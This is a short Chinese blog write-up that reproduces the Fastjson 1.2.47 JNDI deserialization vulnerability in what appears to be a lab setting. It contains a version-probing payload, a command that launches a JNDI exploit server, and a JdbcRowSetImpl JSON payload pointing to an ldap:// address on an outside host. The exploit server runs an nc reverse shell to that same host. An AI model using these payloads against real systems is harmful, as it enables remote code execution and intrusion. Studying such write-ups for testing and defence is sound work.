1247-jndi
Fastjson 1247-jndi
复现过程#
依旧是探测一下 fastjson 的版本,使用:
{
"@type": "java.lang.AutoCloseable"
关于这种方式探测fastjosn版本,条件是需要response中会回显报错信息,但实际环境可能存在不回显的情况,那就需要利用其他手段了
那么已知fastjson版本为1.2.47,那么我们就可以尝试利用fastjson的JNDI特性来执行命令了。
这次使用的是 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 工具来执行命令。
在 vps 上开启服务:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C " 47.113.221.99 8080 -e sh" -A 47.113.221.99
paylaod:
{"@type":"com.alibaba.fastjson.JSONObject",{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://47.113.221.99:1389/4ardp9",
"autoCommit":true
}
}}""}
这里他是没有 bash 的,所以使用 nc 来反弹命令,这里我 sh 也弹不出来。当然这里打一个内存马也是可以的。
作者:qianyuzz
出处:https://www.cnblogs.com/qianyuzz/p/17999034
版权:本作品采用「署名-非商业性使用-相同方式共享 4.0 国际」许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· winform 绘制太阳,地球,月球 运作规律
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 上周热点回顾(3.3-3.9)